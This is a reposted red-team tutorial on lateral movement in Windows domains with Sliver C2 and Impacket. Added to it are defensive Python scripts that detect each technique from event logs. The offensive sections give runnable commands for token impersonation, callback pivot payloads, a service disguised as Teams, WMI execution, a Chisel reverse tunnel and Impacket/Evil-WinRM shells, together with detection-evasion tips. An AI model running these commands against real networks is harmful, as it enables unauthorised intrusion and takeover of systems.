National Cyber Warfare Foundation (NCWF)

Sliver: Building C2 During a Cyber War – Part 6: Lateral Movement

2025-09-19 14:26:04
milo
Red Team (CNA)

The post Sliver: Building C2 During a Cyber War – Part 6: Lateral Movement first appeared on Hackers Arise.

Welcome back, cyberwarriors.

In our previous chapter, we explored domain reconnaissance and emphasized how critical it is to understand your target environment in depth. Even a small Active Directory domain can contain a surprisingly complex network of access control lists (ACLs), security groups, machines, Group Policy Objects (GPOs), and other components. To effectively navigate that landscape, it helps to visualize it using tools like BloodHound or rely on precise queries through PowerView and SharpView, depending on what you are after.

In this part, we will focus on lateral movement, another vital stage in any Active Directory operation. On its own, lateral movement is not particularly complicated. Its effectiveness is directly tied to the depth of reconnaissance you performed earlier. The more informed you are about the structure of the domain, the more strategically you can spread, minimizing noise and avoiding early detection while reaching the most valuable systems first.

We will begin with techniques available through Sliver C2, then move on to Impacket-based methods. Detection avoidance will also be discussed as part of the operational context. Let’s begin.

Tokens

After compromising an initial machine, the next common step is credential extraction, whether by dumping hashes or leveraging Kerberoasting or AS-REP roasting. Eventually, you end up with plaintext credentials. From there, one efficient way to use these credentials is through token impersonation.

Sliver’s make-token feature mimics the behavior of Windows’ built-in token management capabilities. It creates a new logon session with the provided credentials, allowing you to act as that user over the network, while keeping your original session intact locally. This dual identity model is useful when you want to interact with systems as a privileged user without fully switching contexts.

Here is the syntax for creating a token:

sliver (session) > make-token -u admin -p password -d domain.ru

After impersonating the domain admin, you can test your access:

sliver (session) > ls //DC.DOMAIN.RU/c$

If listing files on the domain controller works, you are likely authorized to read them as well.

File uploads and downloads also become possible at this stage. One trick worth noting: uploading a shortcut that links to a nonexistent network path can force Windows to authenticate to your listener if you’re running Responder. This can capture NTLMv2 hashes that can later be cracked offline.

It is important to use fully qualified domain names (FQDNs) wherever possible, as they are more reliable and expected by many tools by default.
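
The defender's side of the make-token step above, as an added example that is not part of the original post or of Sliver: a logon session created with alternate network credentials (what make-token and runas /netonly both produce) is recorded as Security event 4624 with LogonType 9 (NewCredentials). The Subject and Target fields keep the caller's own identity, while the alternate account lands in TargetOutboundUserName / TargetOutboundDomainName. The script parses constructed 4624 records in flattened key=value form and raises severity when such a logon appears on a host where network-only admin work is not expected, when the alternate account belongs to a different domain, or when the logon was requested by something other than the Secondary Logon service host. The sample records, the host allowlist and the svchost.exe heuristic are assumptions made for this example.

```python
import re
from typing import Dict, List

# Constructed sample records: flattened Security 4624 events in key=value form,
# the way a SIEM might export them. Made up for this example, not real telemetry.
SAMPLE_4624 = """\
EventID=4624 LogonType=2 SubjectUserName=- SubjectDomainName=- TargetUserName=jdoe TargetDomainName=CORP TargetOutboundUserName=- TargetOutboundDomainName=- WorkstationName=WS01 ProcessName=C:\\Windows\\System32\\winlogon.exe
EventID=4624 LogonType=9 SubjectUserName=jdoe SubjectDomainName=CORP TargetUserName=jdoe TargetDomainName=CORP TargetOutboundUserName=admin TargetOutboundDomainName=domain.ru WorkstationName=WS01 ProcessName=C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe
EventID=4624 LogonType=9 SubjectUserName=helpdesk SubjectDomainName=CORP TargetUserName=helpdesk TargetDomainName=CORP TargetOutboundUserName=helpdesk-adm TargetOutboundDomainName=CORP WorkstationName=JUMP01 ProcessName=C:\\Windows\\System32\\svchost.exe
EventID=4624 LogonType=3 SubjectUserName=- SubjectDomainName=- TargetUserName=admin TargetDomainName=DOMAIN TargetOutboundUserName=- TargetOutboundDomainName=- WorkstationName=WS01 ProcessName=-
"""

# Hosts where runas /netonly-style admin work is expected (constructed allowlist).
EXPECTED_NETONLY_HOSTS = {"JUMP01"}

# Under runas /netonly the Secondary Logon service, hosted in svchost.exe, performs
# the logon. A tool calling LogonUser itself shows up under its own process name.
# This is a heuristic for the example, not a hard rule.
SECLOGON_HOST = "svchost.exe"


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened key=value record into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def detect_new_credentials_logons(log_text: str, expected_hosts=EXPECTED_NETONLY_HOSTS) -> List[dict]:
    """Return one finding per 4624 LogonType 9 (NewCredentials) event.

    A NewCredentials logon keeps the local identity (TargetUserName equals the
    caller) and stores the alternate identity in TargetOutboundUserName /
    TargetOutboundDomainName. Severity is raised when the logon happens on an
    unexpected host, switches domains, or is not requested via the Secondary
    Logon service host.
    """
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "9":
            continue
        reasons = []
        host = ev.get("WorkstationName", "")
        if host not in expected_hosts:
            reasons.append(f"network-only logon on unexpected host {host}")
        if ev.get("TargetOutboundDomainName", "").lower() != ev.get("SubjectDomainName", "").lower():
            reasons.append("alternate credentials belong to a different domain")
        if not ev.get("ProcessName", "").lower().endswith(SECLOGON_HOST):
            reasons.append(f"logon requested directly by {ev.get('ProcessName')}")
        findings.append({
            "host": host,
            "local_user": f"{ev.get('SubjectDomainName')}\\{ev.get('SubjectUserName')}",
            "outbound": f"{ev.get('TargetOutboundUserName')}@{ev.get('TargetOutboundDomainName')}",
            "severity": "high" if reasons else "low",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in detect_new_credentials_logons(SAMPLE_4624):
        print(f["severity"].upper(), f["host"], f["local_user"], "->", f["outbound"], "; ".join(f["reasons"]))
```

Every LogonType 9 event is reported, because legitimate admins use runas /netonly too; the reasons list is what separates a jump-host routine from an alternate-domain logon requested by a binary in a user's Temp folder.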





PsExec Pivot

To extend your C2 reach within the internal network, you’ll need to establish new active sessions. This is where pivoting comes in. Pivoting allows you to access machines that are not directly connected to the internet by using one that you have already compromised as a relay point.

The PsExec tool in Impacket mirrors Microsoft’s original Sysinternals utility. It remotely spawns a process on the target machine and lets you interact with it. While modern antivirus solutions have learned to detect Impacket-style PsExec behavior, the tool still offers advantages, especially the ability to authenticate using an NTLM hash instead of plaintext credentials.

If you haven’t already created a token for this session, now is the time:

sliver (session) > make-token -u admin -p password -d domain.ru

Then you’ll want to start a pivot listener on the host you’ve already compromised. By default, the listener runs on port 9898.

sliver (session) > pivots tcp --bind 192.168.1.90

Next, you generate a service executable that will connect back to your listener:

sliver (session) > generate --format service -i 192.168.1.90:9898 --skip-symbols -N psexec-pivot

You can enhance stealth by assigning a believable name and description to the service:

sliver (session) > psexec --custom-exe /root/payloads/psexec-pivot.exe --service-name Teams --service-description MicrosoftTeams target.domain.ru

If the target system is unprotected by antivirus or endpoint detection tools, the payload will execute successfully, giving you a SYSTEM-level shell.
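
The service created by the psexec step is also the first thing a defender sees: the System log records event 7045 (A service was installed) with the service name and its image path. As an added example, not code from the post or from Sliver, the script below triages constructed 7045 records with three heuristics: a binary sitting directly in the Windows directory (which is what the ADMIN$ share maps to) or in a staging folder such as C:\Windows\Tasks, a random-looking service name, and a service named after a desktop product whose binary is not under Program Files, which is exactly what the Teams / MicrosoftTeams disguise above produces. The directory lists, product keywords and sample events are assumptions made for this example.

```python
import re
from typing import Dict, List

# Constructed System event 7045 records (not real telemetry). ImagePath is kept in
# the raw form Windows logs it: optional quotes, environment variables, arguments.
SAMPLE_7045 = [
    {"ServiceName": "Sense", "ImagePath": '"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe"'},
    {"ServiceName": "Teams", "ImagePath": "%SystemRoot%\\psexec-pivot.exe"},
    {"ServiceName": "xKpQ", "ImagePath": "%SystemRoot%\\oMhXqzKe.exe"},
    {"ServiceName": "UpdateSvc", "ImagePath": "C:\\Windows\\Tasks\\update.exe -k"},
]

# Constructed allowlists for the example.
PROGRAM_FILES_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\") + PROGRAM_FILES_DIRS
STAGING_DIRS = ("c:\\windows\\tasks\\", "c:\\windows\\temp\\", "c:\\users\\", "c:\\programdata\\")
# Desktop products whose names a fake service might borrow; a real install of any
# of these lives under Program Files.
BORROWED_PRODUCT_NAMES = ("teams", "onedrive", "office", "chrome", "zoom")


def normalize_image_path(image_path: str) -> str:
    """Lower-case the path, expand %SystemRoot%, drop quotes and service arguments."""
    p = image_path.strip().strip('"')
    p = re.sub(r"%systemroot%", lambda _: "c:\\windows", p, flags=re.IGNORECASE)
    p = p.lower()
    end = p.find(".exe")
    return p[: end + 4] if end != -1 else p


def looks_random(name: str) -> bool:
    """Short alphabetic name, mixed case, almost no vowels: heuristic for generated names."""
    if not re.fullmatch(r"[A-Za-z]{4,8}", name):
        return False
    mixed_case = name not in (name.lower(), name.upper(), name.capitalize())
    vowels = sum(c in "aeiouAEIOU" for c in name)
    return mixed_case and vowels < 2


def score_service_install(ev: Dict[str, str]) -> List[str]:
    """Return the reasons a 7045 event deserves a look (empty list means benign)."""
    name = ev["ServiceName"]
    path = normalize_image_path(ev["ImagePath"])
    directory = path.rsplit("\\", 1)[0] + "\\"
    reasons = []
    if directory == "c:\\windows\\":
        reasons.append("binary sits directly in the Windows directory (where ADMIN$ maps)")
    elif path.startswith("\\\\") or directory.startswith(STAGING_DIRS):
        reasons.append(f"binary in a writable or staging location: {directory}")
    elif not directory.startswith(TRUSTED_DIRS):
        reasons.append(f"binary outside trusted install directories: {directory}")
    if looks_random(name):
        reasons.append(f"random-looking service name: {name}")
    if any(p in name.lower() for p in BORROWED_PRODUCT_NAMES) and not directory.startswith(PROGRAM_FILES_DIRS):
        reasons.append("service name borrows a product name but binary is not under Program Files")
    return reasons


def triage_service_installs(events: List[Dict[str, str]]) -> List[dict]:
    """Keep only the installs that matched at least one heuristic."""
    out = []
    for ev in events:
        reasons = score_service_install(ev)
        if reasons:
            out.append({"ServiceName": ev["ServiceName"], "reasons": reasons})
    return out


if __name__ == "__main__":
    for finding in triage_service_installs(SAMPLE_7045):
        print(finding["ServiceName"])
        for r in finding["reasons"]:
            print("   ", r)
```

A believable display name defeats the random-name check but not the other two, which is why the path heuristics carry more weight than the name in practice.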





WMI Pivot

WMI (Windows Management Instrumentation) provides administrators with a unified way to manage both local and remote machines. From a red team perspective, WMI is also a native method for remote code execution, provided you have local admin rights.

If you’ve followed the earlier steps, your listener should still be running. Now generate a pivot binary tailored for WMI delivery:

sliver (session) > generate -i 192.168.1.90:9898 --skip-symbols -N wmicpivot

Upload the file to the target host, ideally in a directory that is unlikely to be inspected:

sliver (session) > cd //target.domain.ru/c$/windows/tasks

sliver (session) > upload wmicpivot.exe

Then remotely execute the payload via WMI:

sliver (session) > execute -o wmic /node: /user:admin /password:password process call create "C:\\windows\\tasks\\wmicpivot.exe"

Once again, this should return a SYSTEM-level session if everything is configured properly.





Impacket

While Sliver integrates many tools natively, it’s important to understand how to perform lateral movement without relying solely on one C2 platform. Impacket provides a range of utilities for executing commands remotely using different Windows communication protocols.

Proxy Setup

All Impacket tools we’re about to use require a working proxy connection. One effective option is Chisel, which can tunnel SOCKS connections over HTTP/S.

First, start a Chisel server on your C2:

sudo chisel server --reverse -v -p 1257 --socks5

Then initiate a reverse connection from the compromised machine:

sliver (session) > chisel client -v :1257 R:socks

Ensure that your /etc/proxychains4.conf (or proxychains.conf) contains the correct SOCKS5 entry:

socks5 127.0.0.1 1080

Make sure port 1080 is not used by any other service, as Chisel defaults to it.





WMI Execution

WMI is often open within domain environments. Here’s how to launch a WMI shell via Impacket:

c2 > proxychains4 wmiexec.py domain.ru/admin:password@

If successful, this gives you a semi-interactive command shell on the remote host. Note that wmiexec.py can be detected because, by default, it writes the output of each command to a file on the ADMIN$ share. You can choose a different share with the -share option, for example C$.





PsExec Execution

If WMI is unavailable, PsExec remains a solid option, especially when the SMB port (445) is open:

c2 > proxychains4 psexec.py domain.ru/admin:password@

This again yields a SYSTEM-level shell, assuming proper credentials and open ports. We recommend using Microsoft’s original Sysinternals utility to avoid detection.





DCOM Execution

DCOM allows attackers to remotely instantiate COM objects on target systems. This method is useful for memory-resident operations that do not require scheduled tasks or services. Lateral movement via DCOM is harder to detect since DCOM has many methods with different IOCs:

c2 > proxychains4 dcomexec.py -object MMC20 domain.ru/admin:password@

DCOM communicates over ports 135, 445, and dynamic high ports, so you’ll need those open for the connection to succeed.





Evil-WinRM

Evil-WinRM provides a more interactive experience, letting you run PowerShell and CMD commands over the WinRM service. It’s especially useful when operating with Administrator credentials:

c2 > proxychains4 evil-winrm -i -u Administrator -H

This drops you into an interactive shell with file upload/download capabilities and native PowerShell execution.
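
The methods in the WMI Pivot, WMI Execution, PsExec Execution, DCOM Execution and Evil-WinRM sections each start the remote command under a characteristic parent process, so a defender with a process-creation feed can classify all of them in one pass: WmiPrvSE.exe for WMI (both the wmic call and wmiexec.py), services.exe launching a binary from outside the system directories for a PsExec-style service, mmc.exe started with -Embedding for the MMC20.Application DCOM object, and wsmprovhost.exe for WinRM. wmiexec.py additionally leaves its output redirection (\\127.0.0.1\<share>\__<timestamp>) in the command line; the -share switch discussed above only changes the share name inside that pattern. The following is an added example, not code from the post, from Sliver or from Impacket; it assumes Sysmon Event ID 1 field names, and the sample records and trusted-directory list are constructed.

```python
import re
from typing import Dict, List

# Directories from which services.exe is expected to start service binaries
# (constructed allowlist for the example).
TRUSTED_SERVICE_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# wmiexec.py redirects each command's output to \\127.0.0.1\<share>\__<unix time>.
# The -share option swaps ADMIN$ for another share name, so the pattern still matches.
WMIEXEC_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\[A-Za-z]+\$\\__\d+(?:\.\d+)?", re.IGNORECASE)

# Constructed Sysmon Event ID 1 records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\Tasks\\wmicpivot.exe", "CommandLine": "C:\\windows\\tasks\\wmicpivot.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1726750000.12345 2>&1",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"},
    {"Image": "C:\\Windows\\psexec-pivot.exe", "CommandLine": "C:\\Windows\\psexec-pivot.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe", "ParentCommandLine": "C:\\Windows\\system32\\services.exe"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe", "ParentCommandLine": "C:\\Windows\\system32\\mmc.exe -Embedding"},
    {"Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe", "ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"},
    {"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE"},
    {"Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": "C:\\Windows\\System32\\services.exe", "ParentCommandLine": "C:\\Windows\\system32\\services.exe"},
]


def classify_process_event(ev: Dict[str, str]) -> List[str]:
    """Return the lateral-movement indicators matched by one process-creation event."""
    parent = ev["ParentImage"].lower().rsplit("\\", 1)[-1]
    parent_cmd = ev.get("ParentCommandLine", "").lower()
    image = ev["Image"].lower()
    hits = []
    if parent == "wmiprvse.exe":
        hits.append("child of WmiPrvSE.exe: process created over WMI (wmic / wmiexec.py)")
    if parent == "services.exe" and not image.startswith(TRUSTED_SERVICE_DIRS):
        hits.append("services.exe started a binary outside trusted directories: PsExec-style service")
    if parent == "mmc.exe" and "-embedding" in parent_cmd:
        hits.append("child of mmc.exe launched for DCOM (-Embedding): MMC20.Application ExecuteShellCommand")
    if parent == "wsmprovhost.exe":
        hits.append("child of wsmprovhost.exe: command executed over WinRM")
    if WMIEXEC_REDIRECT.search(ev.get("CommandLine", "")):
        hits.append("output redirected to \\\\127.0.0.1\\<share>\\__<timestamp>: wmiexec.py pattern")
    return hits


def triage(events: List[Dict[str, str]]) -> List[dict]:
    """Keep only events that matched at least one indicator."""
    out = []
    for ev in events:
        hits = classify_process_event(ev)
        if hits:
            out.append({"image": ev["Image"], "parent": ev["ParentImage"], "hits": hits})
    return out


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["parent"], "->", finding["image"])
        for h in finding["hits"]:
            print("   ", h)
```

The parent-process rules fire on legitimate remote administration as well, so they are hunting leads to be joined with the account, source host and time of day rather than alerts on their own; the wmiexec.py redirect pattern is the one rule here that is specific to a tool.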





Conclusion

You’ve now seen several approaches to lateral movement across Windows environments using both Sliver C2 and Impacket. From token impersonation and pivoting with PsExec or WMI, to in-memory execution via DCOM and remote shells over WinRM, these techniques give you the flexibility to adapt to a variety of network defenses and operational requirements.

Source: HackersArise
Source Link: https://hackers-arise.com/sliver-building-c2-during-a-cyber-war-part-6-lateral-movement/